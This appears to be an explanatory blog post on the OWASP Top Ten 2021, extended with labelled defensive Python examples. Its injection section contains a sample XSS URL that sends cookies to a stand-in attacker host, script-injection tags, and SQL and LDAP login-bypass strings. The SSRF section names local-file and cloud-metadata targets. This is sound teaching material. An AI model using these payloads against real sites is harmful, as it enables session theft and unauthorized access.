OWASP Top Ten 2021

dieutb
7 min read · Mar 23, 2022

What is OWASP?

  • stands for “Open Web Application Security Project”
  • a nonprofit foundation that works to improve the security of software

OWASP Top Ten

1. Broken Access Control

  • This weakness is often found on sites where authentication and permission checks are lacking.
  • Take an example: a simple business website with no authentication for the admin, who only needs to go to a specific path to control the content on the website (“/my-admin-security-path-no-one-ever-know-abcxyz”). Only the administrator knows the path, but that is not secure enough: the browser requests it with a GET, so the URL is kept in the browser history and cache, and it may accidentally be leaked when sent through a chat channel, etc.
  • The second example is a website with many roles and permissions such as admin, marketer, operator, developer, etc. All users are required to log in by SSO (single sign-on) or a normal username/password. After login, the user is redirected to the path that corresponds to their role (/marketer, /operator, etc.). However, the system does not restrict users by their granted permissions, so anyone can access other parts and manage data unrelated to their role by typing a direct URL into the browser.
  • For objects controlled by an owner, the system may be missing an authorization check when it receives a command from any user. This can allow a private object to be viewed, edited, or deleted by another account.
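The three scenarios above come down to the same two checks on every request: who is the caller, and is this caller allowed to touch this route or this object? The example below is added here and is not code from the post; it models the scenarios with hypothetical names (`User`, `Document`, `route_allowed`, `secure_update`) and constructed sample users and documents. Role-gated URL prefixes with deny-by-default replace the "secret admin path", and an ownership check on the object replaces trusting whoever knows the object id.

```python
"""Access-control checks for the post's three scenarios (added example;
not code from the post).  Names and sample data are hypothetical.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    user_id: int
    role: str            # "admin", "marketer", "operator", ...


@dataclass
class Document:
    doc_id: int
    owner_id: int
    body: str


# Constructed sample principals.
ADMIN = User(1, "admin")
ALICE = User(100, "marketer")
BOB = User(200, "operator")


def sample_docs():
    """Fresh copy of the constructed owner-controlled objects."""
    return {
        1: Document(1, owner_id=100, body="alice's private notes"),
        2: Document(2, owner_id=200, body="bob's private notes"),
    }


# Roles permitted under each URL prefix.  Anything not listed is denied:
# a path is never reachable merely because it is hard to guess.
ROUTE_ROLES = {
    "/admin": {"admin"},
    "/marketer": {"admin", "marketer"},
    "/operator": {"admin", "operator"},
}


def route_allowed(user, path):
    """Authenticated caller whose role is listed for the path's prefix."""
    if user is None:                       # no login -> no access, secret path or not
        return False
    for prefix, roles in ROUTE_ROLES.items():
        if path == prefix or path.startswith(prefix + "/"):
            return user.role in roles
    return False                           # deny by default


def insecure_update(docs, user, doc_id, new_body):
    """The post's third scenario: the id is trusted and the caller is never checked."""
    docs[doc_id].body = new_body
    return True


def secure_update(docs, user, doc_id, new_body):
    """Authenticated caller who owns the object (or is an admin) may change it.
    Missing and forbidden objects get the same answer, so a caller cannot
    learn which ids exist from the difference."""
    if user is None:
        return False
    doc = docs.get(doc_id)
    if doc is None or (doc.owner_id != user.user_id and user.role != "admin"):
        return False
    doc.body = new_body
    return True


if __name__ == "__main__":
    docs = sample_docs()
    print("bob edits alice's doc (insecure):", insecure_update(docs, BOB, 1, "defaced"))
    docs = sample_docs()
    print("bob edits alice's doc (secure):  ", secure_update(docs, BOB, 1, "defaced"))
    print("alice on /admin:", route_allowed(ALICE, "/admin"),
          "| alice on /marketer:", route_allowed(ALICE, "/marketer"))
```

The important design choice is that both checks are evaluated server-side on every request, independent of which links the UI showed after login: the redirect to /marketer is a convenience, the role table is the control.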

2. Cryptographic Failures

  • This category was previously known as “Sensitive Data Exposure”. As the name says, the issue is about the user’s data being exposed accidentally. The system may store information such as email, name, birthday, role_id, etc. in the browser’s cookies or local storage, which makes it easier for a hacker to work out a user’s password.
  • Hackers can also obtain sensitive information such as email, password, access_token, etc. from unsecured data transmission (no SSL, so the information is not encrypted).

3. Injection: LDAP Injection, Cross-site Scripting (XSS) and SQL Injection

  • Cross-site scripting (XSS). The hacker injects an external script (JavaScript, HTML, PHP, etc.) into the URL or into the content of the website. Two types commonly occur:
    a. Reflected XSS. The script is attached to the URL and the victim is lured into clicking on it. If the user’s session on the website is still live, the hacker can get all the information stored in the browser’s cookies and access the user’s account.
    b. Stored XSS. The hacker writes a malicious script and saves it in his account information. Then, every time others visit his page, their cookies are sent to the hacker’s server.
- Cross-site scripting XSS with JS
https://abc.com?msg=var+i=new+Image;+i.src="http://hacker-site.net/cookie="%2Bdocument.cookie;
- Cross-site scripting XSS with DOM
https://abc.com?msg=<script src="hacker.js"></script>
- Stored XSS. The hacker registers an account on the website and attaches his script to a specific page. The script is executed whenever any user visits his page:
<script src="hacker.js"></script>
  • SQL Injection. This happens when the server inserts text received from a request parameter directly into the SQL query. A hacker can then log in to any account with a query that always returns true:
Post /login
Body:
- Name: " or ""="
- Pass: " or ""="
The server query would be:
- original query:
SELECT * FROM Users WHERE Name ="Name" AND Pass ="Pass"
- query after injection:
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
  • LDAP Injection (Lightweight Directory Access Protocol). A server-side attack that could reveal sensitive information about users and the server stored in an LDAP directory. It is somewhat similar to SQL Injection, but its purpose is to expose information such as user details and the structure of the query. It uses specific characters injected into the query:
Post /login
Body:
- Name: admin)(&)) => (&) always returns true
- Pass: something
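All three injection types share one root cause: untrusted text is spliced into a structured language (SQL, an LDAP filter, HTML) where it is read as grammar rather than as data. The example below is added here and is not code from the post; it puts the post's login query built by string concatenation beside its parameterized form (SQLite in memory, table and row constructed), escapes LDAP filter values per RFC 4515 so the post's `admin)(&))` cannot close the filter, and HTML-escapes a reflected `msg` parameter. The SQL payload is the single-quote form of the post's `" or ""="`, because SQLite reads double quotes as identifiers; the bypass works the same way. Function names are hypothetical.

```python
"""Injection defenses for the post's three cases (added example, not code
from the post).  Function names are hypothetical; sample data is constructed.
"""
import html
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Name TEXT, Pass TEXT)")
    # Plain-text password only to mirror the post's query; real stores keep hashes (section 7).
    con.execute("INSERT INTO Users VALUES ('admin', 'correct horse')")
    return con


def login_concat(con, name, password):
    """Vulnerable: input becomes part of the SQL text, so ' or ''=' rewrites the WHERE clause."""
    query = f"SELECT * FROM Users WHERE Name ='{name}' AND Pass ='{password}'"
    return con.execute(query).fetchone() is not None


def login_param(con, name, password):
    """Safe: placeholders keep the values out of the SQL grammar entirely."""
    query = "SELECT * FROM Users WHERE Name = ? AND Pass = ?"
    return con.execute(query, (name, password)).fetchone() is not None


# --- LDAP: the characters RFC 4515 reserves inside a filter value --------
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape_value(value):
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def ldap_login_filter(name):
    """Build the lookup filter; an escaped 'admin)(&))' can no longer close the filter."""
    return f"(&(uid={ldap_escape_value(name)})(objectClass=person))"


# --- XSS: encode for the HTML body context before output -----------------
def render_message(msg):
    """Reflecting a query parameter like the post's ?msg= requires escaping it first."""
    return f"<p>{html.escape(msg, quote=True)}</p>"


if __name__ == "__main__":
    con = make_db()
    payload = "' or ''='"
    print("concat login with payload:", login_concat(con, payload, payload))   # True: bypass
    print("param  login with payload:", login_param(con, payload, payload))    # False
    print(ldap_login_filter("admin)(&))"))
    print(render_message('<script src="hacker.js"></script>'))
```

Note that the XSS fix is context-specific: `html.escape` is correct for text between tags and inside quoted attributes, but a value placed into a `<script>` block or a URL needs the encoding of that context instead.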

4. Insecure Design

  • Insecure Design is a new category for 2021, with a focus on risks related to design flaws.

5. Security Misconfiguration

  • It occurs when errors are reported in too much detail or with default settings left in place. For example, when a user visits a page that does not exist, he receives the default NGINX not-found page; a failed search query returns an error that includes the database type; or the error message is too specific, such as the username does not exist, the password must be longer than 8 characters and include a special character, wrong password, etc.

6. Vulnerable and Outdated Components

  • It is about version control of third-party modules and plugins. An outdated component can be incompatible with other parts such as nested dependencies, the OS, or system libraries. All libraries should be tracked for updates, and updated, upgraded, or patched libraries should be tested for compatibility.
  • Before using a third-party library, double-check its release number, the number of maintainers, its reliability, the number of downloads, whether it has been security tested, and its nested/dependency libraries.

7. Identification and Authentication Failures

  • Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords, brute force, or other automated attacks
  • Permits default, weak, or well-known passwords, such as “Password1” or “admin/admin”
  • Uses weak or ineffective credential recovery and forgot-password processes, such as “knowledge-based answers”, which cannot be made safe
  • Uses plain text, encrypted, or weakly hashed password data stores (see 2. Cryptographic Failures)
  • Has missing or ineffective multi-factor authentication
  • Exposes session identifiers in the URL
  • Reuses the session identifier after successful login
  • Does not properly invalidate user sessions or authentication tokens (mainly single sign-on (SSO) tokens) during logout or a period of inactivity
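Several of these items, together with the cookie and local-storage point from section 2, are handled by one piece of server-side plumbing: store only salted password hashes, refuse well-known passwords, give the browser an opaque random session id (never email or role_id), issue a fresh id at login so a pre-login id cannot be reused, and drop the session on logout or after inactivity. The example below is added here and is not code from the post; `Accounts`, `SessionStore`, `session_cookie` and the denylist are hypothetical, and `clock` is injectable so the inactivity timeout can be exercised without waiting.

```python
"""Credential storage and session handling (added example, not code from
the post).  Names are hypothetical; the password denylist is constructed.
"""
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ITERATIONS = 600_000          # OWASP's current figure for PBKDF2-HMAC-SHA256
SALT_LEN = 16
KNOWN_BAD_PASSWORDS = {"password1", "admin", "123456", "qwerty"}   # constructed, tiny denylist


def hash_password(password, salt=None):
    """Return salt || PBKDF2-HMAC-SHA256(password); the plain text is never stored."""
    salt = salt or os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt + digest


def verify_password(stored, password):
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def is_acceptable_password(password):
    """Reject short passwords and the well-known ones the post cites ("Password1", "admin")."""
    return len(password) >= 8 and password.lower() not in KNOWN_BAD_PASSWORDS


class Accounts:
    """Server-side user records.  Unknown usernames are checked against a
    dummy hash so a lookup takes the same time either way."""

    def __init__(self):
        self._users = {}
        self._dummy = hash_password(secrets.token_hex(16))

    def create(self, username, password):
        if not is_acceptable_password(password):
            raise ValueError("password is too short or too common")
        self._users[username] = hash_password(password)
        return True

    def check(self, username, password):
        stored = self._users.get(username, self._dummy)
        ok = verify_password(stored, password)
        return ok and username in self._users


class SessionStore:
    """The browser holds only an opaque random id; user attributes stay here."""

    def __init__(self, idle_timeout=900, clock=time.monotonic):
        self._sessions = {}
        self.idle_timeout = idle_timeout
        self.clock = clock

    def login(self, pre_auth_sid, username, role):
        """Issue a fresh id at login; whatever id the browser held before is discarded."""
        self._sessions.pop(pre_auth_sid, None)
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "role": role, "last_seen": self.clock()}
        return sid

    def current(self, sid):
        """Session record if valid; None when unknown or idle beyond the timeout."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        now = self.clock()
        if now - rec["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        rec["last_seen"] = now
        return rec

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: HttpOnly keeps it from page scripts, Secure keeps it off plain HTTP."""
    return f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

The cookie flags tie back to section 3: the post's `document.cookie` payload reads nothing from an HttpOnly cookie, and the Secure flag addresses the unencrypted-transport case from section 2.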

8. Software and Data Integrity Failures

  • It relates to code and infrastructure, such as using untrusted sources, repositories, and content delivery networks, or an insecure CI/CD pipeline (unauthorized access, malicious code, or system compromise)
  • For example, attackers could view the CI/CD pipeline and inject their code into it, or modify its insecure parts
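The standard control for an artifact pulled from a repository or CDN is to pin its digest when it is reviewed and refuse it later if the bytes differ. The example below is added here and is not code from the post: it parses a constructed lock format, verifies a SHA-256 pin with a constant-time compare, and also produces the Subresource Integrity form (`sha256-<base64>`) a browser checks for a `<script src="…" integrity="…">` tag. The lock format, file names and sample bytes are constructed; the empty file's digest is the well-known SHA-256 value.

```python
"""Pinned-digest verification for fetched artifacts (added example, not
code from the post).  Lock format, names and sample data are constructed.
"""
import base64
import hashlib
import hmac


class IntegrityError(Exception):
    """Raised when an artifact does not match its pinned digest (or has none)."""


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def sri_value(data):
    """Subresource Integrity form: 'sha256-' + base64 of the raw digest."""
    return "sha256-" + base64.b64encode(hashlib.sha256(data).digest()).decode()


def parse_lockfile(text):
    """Constructed format: one '<name> sha256=<hex>' per line; '#' starts a comment."""
    pins = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, digest = line.split()
        algo, _, hexdigest = digest.partition("=")
        if algo != "sha256" or len(hexdigest) != 64:
            raise ValueError(f"bad pin for {name}: {digest}")
        pins[name] = hexdigest.lower()
    return pins


def verify_artifact(name, data, pins):
    """True if data matches the pin for name; IntegrityError otherwise.
    An unpinned artifact fails too: 'no pin' must not mean 'anything goes'."""
    expected = pins.get(name)
    if expected is None:
        raise IntegrityError(f"{name}: no pinned digest, refusing to use it")
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        raise IntegrityError(f"{name}: digest mismatch (expected {expected[:12]}..., got {actual[:12]}...)")
    return True


def is_intact(name, data, pins):
    """Boolean wrapper around verify_artifact for callers that prefer not to catch."""
    try:
        return verify_artifact(name, data, pins)
    except IntegrityError:
        return False


# Constructed lock entry: the pin is the SHA-256 of an empty file.
SAMPLE_LOCK = """
# name      digest recorded at review time
empty.js    sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

if __name__ == "__main__":
    pins = parse_lockfile(SAMPLE_LOCK)
    print("original :", is_intact("empty.js", b"", pins))
    print("tampered :", is_intact("empty.js", b"// tampered", pins))
    print("SRI attr :", sri_value(b""))
```

The same idea scales up to signed releases and lock files with transitive pins; the minimum is that a build never consumes bytes whose digest it did not already know.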

9. Security Logging and Monitoring Failures

  • In short, this issue is about missing or insufficient logging: events such as failed logins and suspicious API calls are not logged, or logs are only stored locally. As a result, the application cannot detect, escalate, or alert on active attacks in real time or near real time.
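Logging failed logins is only useful if something reads the log. The example below is added here and is not code from the post; it runs two rules over constructed authentication log lines: a burst of failures from one source address inside a time window, and failures against several distinct usernames from one address (the credential-stuffing pattern from section 7). The log format, field names, addresses and timestamps are all constructed; each rule alerts once per address so a sustained attack does not flood the alert channel.

```python
"""Failed-login detection over constructed auth log lines (added example,
not code from the post).  Line format:
    <ISO-8601 UTC time> login_failed|login_ok user=<name> ip=<addr>
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

LINE_RE = re.compile(r"^(\S+) (login_failed|login_ok) user=(\S+) ip=(\S+)$")


def parse_line(line):
    """Return {'ts', 'event', 'user', 'ip'} or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "event": m.group(2), "user": m.group(3), "ip": m.group(4)}


def detect(lines, threshold=5, window=60, distinct_users=3):
    """Alerts: 'burst' when > threshold failures fall within `window` seconds
    from one ip; 'stuffing' when one ip fails against >= distinct_users names."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> usernames that failed from this ip
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["event"] != "login_failed":
            continue
        ip, ts = ev["ip"], ev["ts"]
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # q holds ts itself, so never empties
            q.popleft()
        users[ip].add(ev["user"])
        if len(q) > threshold and (ip, "burst") not in alerted:
            alerted.add((ip, "burst"))
            alerts.append({"ip": ip, "kind": "burst", "count": len(q), "at": ts.isoformat()})
        if len(users[ip]) >= distinct_users and (ip, "stuffing") not in alerted:
            alerted.add((ip, "stuffing"))
            alerts.append({"ip": ip, "kind": "stuffing", "users": sorted(users[ip]), "at": ts.isoformat()})
    return alerts


# Constructed sample: one address hammers a single account, another tries
# three different accounts, a third fails once, and one line is unparseable.
SAMPLE_LOG = """\
2022-03-23T10:00:01Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:00:03Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:00:05Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:00:07Z login_ok user=bob ip=198.51.100.20
2022-03-23T10:00:09Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:00:11Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:00:13Z login_failed user=alice ip=203.0.113.5
2022-03-23T10:01:00Z login_failed user=alice ip=198.51.100.7
2022-03-23T10:01:02Z login_failed user=bob ip=198.51.100.7
2022-03-23T10:01:04Z login_failed user=carol ip=198.51.100.7
2022-03-23T10:05:00Z login_failed user=dave ip=192.0.2.9
this line is not in the expected format
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

In production the lines would come from a central log pipeline rather than a local file, which is the other half of the post's point: a log that only exists on the compromised host is not evidence the defender can rely on.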

10. Server-Side Request Forgery

  • SSRF flaws occur whenever a web application fetches a remote resource without validating the user-supplied URL.

Example Attack Scenarios

Attackers can use SSRF to attack systems protected behind web application firewalls, firewalls, or network ACLs, using scenarios such as:

Scenario #1: Port scan internal servers — If the network architecture is unsegmented, attackers can map out internal networks and determine if ports are open or closed on internal servers from connection results or elapsed time to connect or reject SSRF payload connections.

Scenario #2: Sensitive data exposure — Attackers can access local files or internal services to gain sensitive information, such as file:///etc/passwd and http://localhost:28017/.

Scenario #3: Access metadata storage of cloud services — Most cloud providers have metadata storage such as http://169.254.169.254/. An attacker can read the metadata to gain sensitive information.

Scenario #4: Compromise internal services — The attacker can abuse internal services to conduct further attacks such as Remote Code Execution (RCE) or Denial of Service (DoS).
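The four scenarios are all blocked by validating the destination before the server fetches it, not by inspecting the URL string alone. The example below is added here and is not code from the post; it accepts only http/https on the default ports, rejects credentials in the URL, resolves the hostname and requires every returned address to be globally routable, which excludes loopback (127.0.0.1, ::1, the `localhost:28017` case), private ranges, and the link-local 169.254.169.254 metadata address. `resolver` is injectable so the demo runs offline with a constructed DNS table; the default uses `socket.getaddrinfo`. Function and exception names are hypothetical.

```python
"""Outbound-URL validation against SSRF (added example, not code from the
post).  Names are hypothetical; the offline DNS table is constructed.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class UnsafeURL(ValueError):
    """The URL must not be fetched on the user's behalf."""


def default_resolver(host):
    """All A/AAAA answers for host; every one must pass, not just the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(addr_str):
    """True only for globally routable unicast addresses (IPv4-mapped IPv6 unwrapped)."""
    addr = ipaddress.ip_address(addr_str)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def validate_outbound_url(url, resolver=default_resolver):
    """Return {'host', 'port', 'addresses'} or raise UnsafeURL.  The caller
    should connect to one of the returned addresses instead of re-resolving
    the name, so a DNS answer cannot change between check and use."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise UnsafeURL("credentials embedded in URL")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        raise UnsafeURL("invalid port")
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP: no DNS lookup
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        raise UnsafeURL(f"host did not resolve: {host}")
    for addr in addrs:
        if not is_public_address(addr):
            raise UnsafeURL(f"{host} resolves to non-public address {addr}")
    return {"host": host, "port": port, "addresses": addrs}


def is_safe(url, resolver=default_resolver):
    """Boolean form of validate_outbound_url."""
    try:
        validate_outbound_url(url, resolver=resolver)
        return True
    except UnsafeURL:
        return False


# Constructed DNS table for an offline demo; 93.184.216.34 stands in for a public host.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "intranet.corp": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "169.254.169.254"],   # one public answer, one metadata answer
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for url in ["https://example.com/report.pdf", "file:///etc/passwd",
                "http://localhost:28017/", "http://169.254.169.254/latest/meta-data/",
                "http://rebind.example/"]:
        try:
            print("allow", validate_outbound_url(url, resolver=fake_resolver))
        except UnsafeURL as e:
            print("deny ", url, "->", e)
```

Two details matter in practice. First, every resolved address is checked, so a name that answers with one public and one internal address (the `rebind.example` entry) is refused. Second, the fetcher must also disable or re-validate HTTP redirects, since a public URL that 302s to an internal one would otherwise bypass the check.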
